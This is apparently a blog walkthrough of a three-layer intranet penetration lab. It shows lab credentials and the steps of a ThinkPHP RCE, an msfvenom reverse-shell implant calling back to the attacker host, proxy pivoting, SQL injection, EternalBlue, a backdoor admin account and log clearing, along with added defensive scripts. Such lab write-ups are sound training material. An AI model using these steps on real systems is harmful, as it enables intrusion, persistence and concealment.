CFS three-layer intranet target machine penetration

Table of contents

1. Range framework
   Range setup
2. Penetration process
3. Summary

Range introduction:

The three-layer intranet range has three network segments: segment 75 (the public-facing segment), segment 22 (intranet) and segment 33 (intranet).

The range consists of three servers, Target1, Target2 and Target3, running CentOS, Ubuntu and Windows 7 respectively. Target1 has VMnet4 and NAT adapters, Target2 has VMnet9 and VMnet10 adapters, and Target3 has only a VMnet10 adapter.

Building a three-layer intranet range simulates the relationship between the external-facing server, the intranet server and the intranet office environment found in a production environment.

The attacker uses a Kali machine with a VMnet4 adapter to simulate the whole process: collect information from the external network, obtain website information, exploit a website vulnerability to take control of the external server, and use that compromised server as a springboard to reach the intranet server through a proxy. A vulnerability in the intranet server's website then yields a second foothold; a second-level proxy is set up to reach the intranet office environment, and finally a host vulnerability is used to obtain control of the intranet host.

For the proxy you can use the tool built into msf or some other tool; the principle is the same. The next article will cover the EarthWorm (ew) proxy tool, which in my testing is more stable than the msf one: the host does not hang during scanning.

Range framework:

I borrowed the diagram (I am too lazy to draw one), so the IP addresses are changed here:

kali:    192.168.75.44

target1: 192.168.75.132
         192.168.22.130

target2: 192.168.22.131
         192.168.33.130

target3: 192.168.33.131
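The address list above is enough to reason about why the penetration has to be done in layers: Kali shares a segment only with Target1, Target1 is dual-homed on 75 and 22, Target2 is dual-homed on 22 and 33, and Target3 sits on 33 alone. The following script is an added example (not part of the original post) that models that topology and computes, for each host, how many footholds are needed before it is reachable at all and which new segment each foothold exposes. It assumes /24 prefix lengths, which the post does not state.

```python
import ipaddress
from collections import deque

# Interface addresses as listed in the post. The /24 prefix length is an
# assumption; the post gives addresses only.
HOSTS = {
    "kali":    ["192.168.75.44/24"],
    "target1": ["192.168.75.132/24", "192.168.22.130/24"],
    "target2": ["192.168.22.131/24", "192.168.33.130/24"],
    "target3": ["192.168.33.131/24"],
}


def segments(host):
    """Set of networks the host has an interface on."""
    return {ipaddress.ip_interface(a).network for a in HOSTS[host]}


def adjacent(a, b):
    """Two hosts can talk directly only if they share a segment."""
    return a != b and bool(segments(a) & segments(b))


def pivot_paths(start):
    """Breadth-first search over shared segments.

    Returns, for every host, the shortest chain of hosts from `start`;
    len(chain) - 1 is the number of footholds needed before that host is
    reachable at all.
    """
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        for other in HOSTS:
            if other not in paths and adjacent(cur, other):
                paths[other] = paths[cur] + [other]
                queue.append(other)
    return paths


def new_segments(known, foothold):
    """Segments that become visible once `foothold` is compromised, given the
    segments already reachable (this is what get_local_subnets reveals)."""
    return segments(foothold) - set(known)


def exposure_report(start="kali"):
    """Walk the pivot chain in order and record what each foothold exposes.

    Result: {host: (footholds_needed, [newly exposed segments])}
    """
    paths = pivot_paths(start)
    reachable = set(segments(start))
    report = {}
    for host in sorted(paths, key=lambda h: len(paths[h])):
        if host == start:
            continue
        gained = new_segments(reachable, host)
        report[host] = (len(paths[host]) - 1, sorted(str(n) for n in gained))
        reachable |= segments(host)
    return report


if __name__ == "__main__":
    for host, (hops, gained) in exposure_report().items():
        print(f"{host}: {hops} foothold(s) needed, exposes {gained or 'nothing new'}")
```

From a defender's side the same model shows where segmentation is weakest: the dual-homed hosts (Target1 and Target2) are the only reason segments 22 and 33 are reachable from outside, so those are the machines whose routing, host firewall and outbound connections deserve the closest monitoring.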

Range setup:

The web service must be enabled during the initial configuration of the target machines:

CentOS:
root password: teamssix.com

Pagoda (BT panel) backend login address and credentials:
Address: http://target1ip:8888/a768f109/
Account: eaj3yhsl
Password: 41bb8fee

In the site configuration, fill in the IP address of target1.

Ubuntu:
root password: teamssix.com

Pagoda (BT panel) backend login address and credentials:
Address: http://target2ip:8888/2cc52ec0/
Account: xdynr37d
Password: 123qwe..

Windows 7:
Administrator password: teamssix.com
IP address of this host:

192.168.33.131

Now look at the virtual machine network settings. Add three networks, VMnet4, VMnet9 and VMnet10, with the segments shown below.

Set the network segment of the Kali attack machine:

Set the network segment of Target1:

Set the network segment of Target2:

Set the network segment of Target3:

Check the Kali network segment; the settings are correct. 111 is the NAT segment, used for outbound internet access.

Check the Target1 network segment; the settings are correct. 75 is the public-facing segment and 22 is the intranet segment.

Check the Target2 network segment; the settings are correct. 22 is the intranet segment and 33 is the other intranet segment.

Check the Target3 network segment; the settings are correct. 33 is the intranet segment.

Next, configure the web service of Target1.

Add Target1's IP address and you're done.

Target2's web service is configured the same way.

At this point the configuration of all target machines is complete; let's start the penetration!

Penetration process:

From Kali, check the target machine's IP address: 192.168.75.132

Port scan it and find ports 21, 22, 80, 888, 3306 and 8888 open.

Both 21 and 22 could be brute-forced; you can try that yourself. Here we access port 80 and find that the framework is ThinkPHP V5, version 5.0, which has a known RCE vulnerability. We'll use a small tool to check for it shortly.

First run a directory brute-force to look for sensitive files. This turns up robots.txt.

Visiting it reveals flag1:

flag{QeaRqaw12fs}

Use the ThinkPHP tool to check for related vulnerabilities; it confirms that the RCE exists.

Select the GetShell option for the matching version.

Connect with AntSword and find flag2:

flag{e2D3aFdasde}

Next, pass the shell to msf by generating a reverse-connect implant. "Reverse" means I open a port on my side and the victim, after running our implant, actively connects back to that port. The forward (bind) variant comes later.

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.75.44 lport=4455 -f elf > xiao.elf

Once generated, upload the file with AntSword and give it execute permission.

Open msf locally in Kali and set up the handler with the same payload, port and IP that were used when generating the implant.

After that, execute the implant on the target; it connects back to Kali and we get meterpreter!


Then drop into a shell and run the usual commands to check the IP addresses of the captured target. It has two network adapters, and the second one is on segment 22.

You can also use run get_local_subnets in meterpreter to get the segment,

and add that segment to msf's routing table.

Use msf's auxiliary module to start a SOCKS proxy and set its port.

Then edit the local proxychains configuration to use that port: vim /etc/proxychains4.conf


Now the proxy can be used to scan the host ports on segment 22 from the local machine.

Many ports turn out to be open on segment 22. We used curl through the proxy to access port 80 and got its source code back.

And found a hint: there is SQL injection under this path!

To reach the web service on segment 22 from a browser, first set the browser to use the local proxy configured earlier; after that the site can be accessed.

It is a BageCMS site.

Brute-force its directories, look for sensitive files, and find robots.txt.

Visiting it shows two paths.

Entering the URL finds the backend login page. I don't know the username and password, but the hint said there is a SQL injection at a certain path, so use the SQL injection to extract the username and password.

You can inject by hand here, which is more stable; if you use that (msf) proxy it may hang and you have to reset it. The more stable option is to use ew as the proxy, which I will cover in the next article. In fact I am using ew for the proxy here, and sqlmap runs smoothly.

The database name is dumped. What follows is routine work, so I won't go into detail.
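The injection above works because the login page builds its query by pasting the submitted username and password straight into SQL text. The following is an added example (not BageCMS code and not from the post) that puts a login query written that way next to its parameterized fix, using an in-memory SQLite table with a constructed account, so the difference can be run and observed offline.

```python
import sqlite3


def make_db():
    """Constructed sample table with one account (not the range's credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'constructed-password')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: whatever the user types becomes SQL syntax.

    A quote in the input ends the literal early, and a comment marker
    discards the rest of the WHERE clause, so the password check disappears.
    """
    sql = ("SELECT username FROM admin WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver sends the values separately from the
    statement, so input is only ever compared as data, never parsed as SQL."""
    sql = "SELECT username FROM admin WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Run both variants on the same input and return (vulnerable, safe) results.
    A database error from the vulnerable path is returned as text because an
    error message shown to the user is itself a finding (it confirms injection)."""
    conn = make_db()
    try:
        vuln = login_vulnerable(conn, username, password)
    except sqlite3.Error as exc:
        vuln = "ERROR: " + str(exc)
    return vuln, login_safe(conn, username, password)


if __name__ == "__main__":
    for creds in [("admin", "constructed-password"), ("admin' --", "wrong"), ("O'Brien", "x")]:
        print(creds, "->", compare(*creds))
```

Note that a legitimate name containing an apostrophe (`O'Brien`) breaks the concatenated query outright while the parameterized one simply returns no match; a login form that errors on apostrophes is a cheap sign, visible in ordinary testing, that this class of bug is present.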


Finally we get the username admin and password 123qwe.

After logging in, I got the third flag!

Browsing around, I found that the PHP files of the template can be edited here, so write a one-line webshell into one to get a webshell.


AntSword also needs to be configured to use the proxy; then it can connect.

The path is simple once you look at its structure: r= selects the module, and if you request the tag directly you land on index.php.

After the connection succeeds, segment 33 is visible from AntSword. Next, pass this webshell to msf.

Same operation as before, but this time a forward connection is required, and forward means bind_tcp.

Forward proxy: put simply, the listening port is opened on the controlled server, forming a forward tunnel through that port that the attack machine connects into. Note that the intranet entry point is generally in a DMZ behind a firewall, so you cannot enter the intranet environment directly.

Reverse proxy: the intranet host actively connects out to the proxy machine, and the attack machine then connects to that proxy, forming a reverse tunnel. For example, a VPS listens on a port and the controlled intranet server connects to that port, forming the tunnel.

Just understand this for now. Then, as before: upload, give execute permission, execute.
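The two connection shapes just described leave different traces on the compromised server, and that is what a defender looks for: a bind-style tunnel appears as a listener on a port the server was never meant to serve, a reverse-style tunnel appears as a connection the server itself opened to an unusual port. The script below is an added example (not from the post) that applies those two rules to a constructed connection-table snapshot for the external web server. The expected listener set is the port list the post found on Target1; the expected outbound set and the process names other than the post's xiao implant are assumptions.

```python
# Constructed snapshot of a connection table, one record per line:
#   STATE LOCAL_ADDR:PORT REMOTE_ADDR:PORT PROCESS
# Real data would come from `ss -tnp` or equivalent. Process names are made
# up except "xiao", the implant name used in the post; 203.0.113.10 is a
# documentation-range address standing in for an update mirror.
SNAPSHOT = """\
LISTEN 0.0.0.0:80 - nginx
LISTEN 0.0.0.0:22 - sshd
LISTEN 0.0.0.0:3306 - mysqld
LISTEN 0.0.0.0:6666 - xiao
ESTAB 192.168.75.132:80 192.168.75.44:51544 nginx
ESTAB 192.168.75.132:41022 192.168.75.44:4455 xiao
ESTAB 192.168.75.132:52210 203.0.113.10:443 yum
"""

# Ports the post's scan found open on target1 (what the server is meant to serve).
EXPECTED_LISTENERS = {21, 22, 80, 888, 3306, 8888}
# Assumption: the server only needs DNS, HTTP and HTTPS for updates.
EXPECTED_OUTBOUND = {53, 80, 443}


def parse_snapshot(text):
    """Turn the snapshot text into a list of dicts with integer ports."""
    rows = []
    for line in text.strip().splitlines():
        state, local, remote, proc = line.split()
        lhost, lport = local.rsplit(":", 1)
        if remote == "-":
            rhost, rport = None, None
        else:
            rhost, rport = remote.rsplit(":", 1)
            rport = int(rport)
        rows.append({"state": state, "lhost": lhost, "lport": int(lport),
                     "rhost": rhost, "rport": rport, "proc": proc})
    return rows


def find_tunnels(rows, expected_listeners=EXPECTED_LISTENERS,
                 expected_outbound=EXPECTED_OUTBOUND):
    """Flag bind-style listeners and reverse-style outbound connections.

    Returns a list of (kind, process, detail) tuples.
    """
    findings = []
    for r in rows:
        if r["state"] == "LISTEN" and r["lport"] not in expected_listeners:
            findings.append(("bind-style", r["proc"],
                             f"unexpected listener on port {r['lport']}"))
        elif (r["state"] == "ESTAB"
              and r["lport"] not in expected_listeners   # local port is not a served port,
              and r["rport"] not in expected_outbound):  # so the server opened this itself
            findings.append(("reverse-style", r["proc"],
                             f"outbound to {r['rhost']}:{r['rport']}"))
    return findings


if __name__ == "__main__":
    for kind, proc, detail in find_tunnels(parse_snapshot(SNAPSHOT)):
        print(f"{kind:14} {proc:8} {detail}")
```

The served-port allowlist does the real work in both rules: a connection whose local port is a served port is a client talking to the server, anything else with an established state was initiated by the server, and a listener outside the allowlist is new. Keeping that allowlist accurate per host is the operational cost of this check.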

Use proxychains4 msfconsole to open a second msf through the proxy. The earlier msf must not be closed; it stays running. Use the new one to get the target2 shell:

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set LPORT 6666

set RHOST 192.168.22.131

The same steps as before are used to obtain the network segment in meterpreter, add routes and so on, exactly as shown in the earlier pictures.


Write the newly opened proxy port into proxychains4, then open another new msf to obtain the shell of target3.

First scan the third target machine and find 445 and 139 open. Time for EternalBlue.

First check whether the vulnerability exists, and set up the check module.

If it reports that the target may be vulnerable, go for it.

After setting the exploit and payload, run it.


Great, I got meterpreter. Running shell produced garbled characters, so I entered chcp 65001 to change the code page and the garbling was fixed.

There is no need to escalate privileges; we are already SYSTEM. Check the open ports and find 3389, Remote Desktop, great!


Create a new user and add it to the administrators group.

Open mstsc on Windows, enter the username, password and IP address to open Remote Desktop.


Well, nothing shows up; forget it, change the administrator's password and connect again!


OK!

The flag is on the desktop, and it smells good!

flag{2wAdK32Lsd}

The whole penetration is over. Finally, you can run clearev in meterpreter to clear the event logs; hehe, this is not necessary.
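Every step on the Windows host, from creating a user and adding it to administrators, through the RDP logon and the administrator password change, to clearev at the end, writes a Security-log record with a well-known event ID (4720, 4732, 4624 with logon type 10, 4724 and 1102 respectively). The following is an added example (not from the post) that runs simple triage rules over a constructed sample of such records in a simplified JSON form; timestamps, the svc_backup account name and the allowlisted RDP source are constructed, while 192.168.33.130 is Target2's segment-33 address from the post, the address an RDP session proxied through Target2 would appear to come from.

```python
import json
from datetime import datetime, timedelta

# Standard Windows Security-log event IDs.
ACCOUNT_CREATED = 4720        # A user account was created
ADDED_TO_LOCAL_GROUP = 4732   # A member was added to a security-enabled local group
PASSWORD_RESET = 4724         # An attempt was made to reset an account's password
LOGON = 4624                  # An account was successfully logged on
LOG_CLEARED = 1102            # The audit log was cleared
RDP_LOGON_TYPE = 10           # RemoteInteractive
WINDOW = timedelta(minutes=10)

# Constructed sample records (a real export via wevtutil or a log shipper
# carries many more fields; only the ones the rules need are included).
SAMPLE_LOG = """\
{"EventID": 4720, "SubjectUserName": "SYSTEM", "TargetUserName": "svc_backup", "Time": "2024-01-01T10:02:00"}
{"EventID": 4732, "SubjectUserName": "SYSTEM", "MemberName": "svc_backup", "TargetUserName": "Administrators", "Time": "2024-01-01T10:03:00"}
{"EventID": 4624, "LogonType": 10, "TargetUserName": "svc_backup", "IpAddress": "192.168.33.130", "Time": "2024-01-01T10:05:00"}
{"EventID": 4724, "SubjectUserName": "svc_backup", "TargetUserName": "Administrator", "Time": "2024-01-01T10:06:00"}
{"EventID": 1102, "SubjectUserName": "Administrator", "Time": "2024-01-01T10:20:00"}
{"EventID": 4624, "LogonType": 2, "TargetUserName": "alice", "IpAddress": "-", "Time": "2024-01-01T10:21:00"}
{"EventID": 4624, "LogonType": 10, "TargetUserName": "alice", "IpAddress": "192.168.33.10", "Time": "2024-01-01T10:22:00"}
"""


def parse_events(text):
    """One JSON object per line; returns events sorted by time."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["Time"] = datetime.fromisoformat(ev["Time"])
        events.append(ev)
    return sorted(events, key=lambda e: e["Time"])


def triage(events, rdp_allowlist=()):
    """Apply the rules in time order; returns a list of (severity, message).

    The one correlation rule: an account that is added to Administrators
    within WINDOW of being created is rated high, since that pairing is the
    textbook post-exploitation sequence and rarely legitimate administration.
    """
    alerts = []
    created_at = {}
    for ev in events:
        eid = ev["EventID"]
        if eid == ACCOUNT_CREATED:
            created_at[ev["TargetUserName"]] = ev["Time"]
            alerts.append(("medium", f"local account created: {ev['TargetUserName']}"))
        elif eid == ADDED_TO_LOCAL_GROUP and ev["TargetUserName"] == "Administrators":
            member = ev["MemberName"]
            born = created_at.get(member)
            if born is not None and ev["Time"] - born <= WINDOW:
                alerts.append(("high", f"new account {member} added to Administrators within {WINDOW}"))
            else:
                alerts.append(("medium", f"{member} added to Administrators"))
        elif eid == PASSWORD_RESET:
            alerts.append(("medium", f"password reset for {ev['TargetUserName']} by {ev['SubjectUserName']}"))
        elif eid == LOGON and ev.get("LogonType") == RDP_LOGON_TYPE:
            if ev["IpAddress"] not in rdp_allowlist:
                alerts.append(("medium", f"RDP logon as {ev['TargetUserName']} from {ev['IpAddress']}"))
        elif eid == LOG_CLEARED:
            alerts.append(("high", f"security log cleared by {ev['SubjectUserName']}"))
    return alerts


if __name__ == "__main__":
    for sev, msg in triage(parse_events(SAMPLE_LOG), rdp_allowlist={"192.168.33.10"}):
        print(f"[{sev}] {msg}")
```

Two design points: the rules run in time order so the creation/group-add correlation needs no second pass, and 1102 is rated high on its own because the clear event is the one record clearev cannot remove, which is also why a log forwarded off the host in near real time defeats the cleanup step the post mentions.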

Summary:

  1. First of all, during information gathering we must gradually work out the network topology of the target.
  2. Secondly, we must keep thinking about the transition from one target to the next, using each compromised target as a springboard to penetrate deeper.
  3. Through this range my understanding of proxies gradually deepened.
  4. Review and recall the pitfalls you ran into during the whole penetration. Only by doing it yourself do you hit the problems, think about them, solve them and understand them. For example, when obtaining meterpreter: the callback failing, the session closing, the proxy hanging.
  5. Finally, stay curious and keep doing it!

If you need the small tools used during the penetration, you can send me a private message! Hehe, helping others is the foundation of happiness!


Origin blog.csdn.net/weixin_43938645/article/details/130603608